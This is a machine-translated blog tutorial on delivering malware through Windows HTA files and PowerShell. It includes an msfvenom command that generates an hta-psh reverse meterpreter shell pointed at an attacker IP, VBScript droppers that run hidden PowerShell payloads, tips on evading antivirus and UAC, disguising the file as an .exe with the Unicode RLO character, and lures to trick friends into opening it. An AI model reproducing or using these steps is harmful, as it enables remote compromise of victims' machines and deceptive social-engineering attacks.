As we all know, Powershell has long been integrated into the windows environment, large foreign cattle having all the fun, while the domestic circle rarely hear discussed in Powershell, HTA mention, not computer science probably do not know this is What the hell
There bash Under Linux, there are Powershell under Windows. Powershell .NET rely on this big tree, so also have such a direct call windowsAPI other powerful features and value in use.
Powershell script suffix ps1, this format unlike bat, vbs, exe, etc. Double-click execution, but need to start by powershell.exe, can be used directly:
PowerShell.exe -ExecutionPolicy Bypass -File .\script.ps1
After win7 and server08, Powershell is integrated in the system, a move that facilitates the management server, the same, over the strong dangerous to let his lot.
HTA
hta format, seems a strange suffix, but the actual travel network you are exposed to every day, it is also possible because a web page format, html / htm similar to writing content through html syntax.
HTA is HTML-Application acronym, is a new concept in software development, directly save a hta html pages into a format that is independent of application software, there is no difference between opening the page content, interface with VB, C ++ and other procedures software interface design language makes no difference, displayed as a window interface.
Related content: HTA_ Baidu Encyclopedia
Is a web page! Not that fishing thing! You to teach?
You got it, really like fishing, but have to add, though written in CSS and JS HTA with HTML,, much greater privileges than ordinary web pages, not only the same window interface with other software, it also has a corresponding similar to VB, the same rights written in C ++ desktop applications (read and write files, registry operations, etc.). HTA was originally designed for the production of desktop applications, we are able to execute commands directly call other components.
Generally speaking, HTA is dressed in the cloak of web application exe, if coupled Powershell ...... hey hey
Powershell script to use on Github Soso, crooked nuts are already very thorough research, there are many large cattle penetration script can learn.
Dagger hide Macon, do not laugh, I want to make moves
For the first chestnut: hello.hta (chestnut not poisonous, copy and paste safe to eat ~)
<!--hello.hta--> <html> <head> <title>hello</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <HTA:ApplicationID="oHTA" Applicationname="hta_app" border="thin" borderstyle="normal" icon="hello.ico" maximizebutton="yes" minimizebutton="yes" showintaskbar="no" singleinstance="no" sysmenu="yes" version="777" windowstate="normal" scroll="yes"> </head> <body> <center> <br> <h1>Hello HTA</h1> <br> <h2>( ⊙ o ⊙ )/出来吧!计算器!</h2> <br> </center> <script language="VBScript"> Set Hello = CreateObject("Wscript.Shell") Hello.Run "calc.exe" </script> </body> </html>
Although the page is static, but vbs hta script can be used directly and call Wscript.Shell, after all, people are html home of Big Brother, partial application-oriented type of script, so that, if he thought of as double-clicking the implementation of the "hta Malaysia "is not too much! (Windows built-hta environment, cmd, enter mshta you will find that environment has been integrated in the win, and have entered what does not pop up, just not being given the OK to prove this thing, so plainly, run with hta run exe just like you can double-click) in the instance hello.hta the <HTA:>. are some of the parameters set HTA, HTA before setting details, see related content links.
HTA already have the perfect assist, if coupled with the output of violence Powershell it?
The answer is: you pick it, I came to play three road collapse.
PS: write the old long call powershell of hta, write more wrong child, simply draw injected ShellCode script on Github people write, open Matesploit ready to generate Shellcode, suddenly found that the original has hta-psh ready format on msfvenom, provincial time and effort, it would be a good use. (I take care, did not notice it before ......)
Well, we directly into a hta-psh rebound script:
msfvenom -p windows/meterpreter/reverse_tcp lhost=175.xxx.xxx.xxx lport=8081 -f hta-psh -o test.hta
(Script generated content through base64encode encryption, the students want to learn can be partially reduced base64, observe the preparation of grammar.)
Try to friends, (all kinds of antivirus, security dog, Big Brother-type test environment) directly playing back a meterpreter_shell, click to rebound from an interval of 5-6 seconds, call the powershell and base64 estimate because the processing time (second times seemingly point to open it a bit faster), and the whole process does not trigger the virus, do not even remind truly "open bags of ready to eat."
Cause Analysis:
1. HTA depends on mshta.exe resolution, and comes with the system is mshta.exe, so it was not able to avoid killing with a direct call to perform, will not be suspended or beaten like vbs script fancy.
2. Powershell Well, empathy is the windows of their own people, after adding parameters -nop -w hidden, can bypass the UAC forced to execute the command.
3. Select the port 8081 is also a factor, because there are few anti-virus interception common http port, such as 80/443/21/22/25/445/1433/3306/3389/8080/8888 and so on, without occupying in It can be used.
So rare format who will go after opening? How to use?
A: I do! I! Vote for me! Vote for me! : P
Indeed, a hta file suffix, never seen it, the icon or execution file, open a whiteboard display, very suspicious ......! Spicy touch ...... this time it is up to the monkeys sent reinforcements spicy!
So, the question is, you know Unicode control characters it ......
Unicode character control: control text display attributes, to achieve a similar reverse display attribute setting. And this feature, the same applies in the file name! Let us give him control characters change of name, then rich ornament, when combined with your Cong (rustic) Ming (petty) a little inspiration and social charm, every minute playing the shell is not a dream ~
Come, give another chestnut: deexe.hta
<title>XXX-exp</title> <center> <h1>XXX-exp: death.exe</h1> <br> <h2>Loading...</h2> <br> [<marquee scrollAmount=4 width=350 direction=right>|||||||||||||</marquee>]35% <br> </center> <script language="VBScript"> Set Hackdo = CreateObject("Wscript.Shell") Set Check = CreateObject("Scripting.FileSystemObject") If Check.FileExists(Hackdo.ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then Hackdo.Run "powershell.exe -nop -w hidden calc.exe" End If </script>
Is there such a picture, is not it - people will react to stop a few seconds! Do not spray, I know we certainly do better than I _ (: з ゝ ∠) _
Just replace one Powershell command:
pwershell.exe -nop -w hidden -e ... base64-ps1-payload-balabalabala ...
According to what you think will be able to execute your commands!
Social workers, landscaping can brainstorm, create the perfect picture effect, even if the use of control characters saved as html suffix, the interface is replaced by a black page.
"The new US made a black page to a friend not to, send you a look." - people, all rational event also emotional vulnerability.
(Theoretically by <HTA:> to control the label icon, I do not know why the test was not successful.)
If you want to pretend to flash back effect, at the end of the script can be added directly execute "taskkill / f / im mshta.exe" kill off mshta process, because shellcode is injected executed in powershell, as long as powershell alive, session can be held.
<script language="VBScript"> Set Hackdo = CreateObject("Wscript.Shell") Set Check = CreateObject("Scripting.FileSystemObject") If Check.FileExists(Hackdo.ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then Hackdo.Run "powershell.exe -nop -w hidden calc.exe" Hackdo.Run "taskkill /f /im mshta.exe" End If </script>
PS: the actual penetration, after obtaining session remember quickly migrate [another-pid] oh
It's just a bomb calculator script, they can copy down the actual operation again, copy, create a new txt document, open, paste and save it as name deexe.hta, the right to rename, right-click the cursor in between de and exe.hta selecting Unicode insert control characters, click insert RLO.
Walaaa ~ Congratulations to get a new name death.exe! Is replaced with execution msf_reverse, quickly issued based Friends of a nuclear bomb test-fired a new creation!
Scene simulation:
"I wrote a 0day, xxx-server directly seconds! Prior to you play?"
"Haoyahaoya! Huh? Huh been reading ......? Flash back ......"
"You delete it! There are bug! I would like to change to change ......"
(1 ... 2 ... 3 ... Bouncing bombs, war a pain!
Quote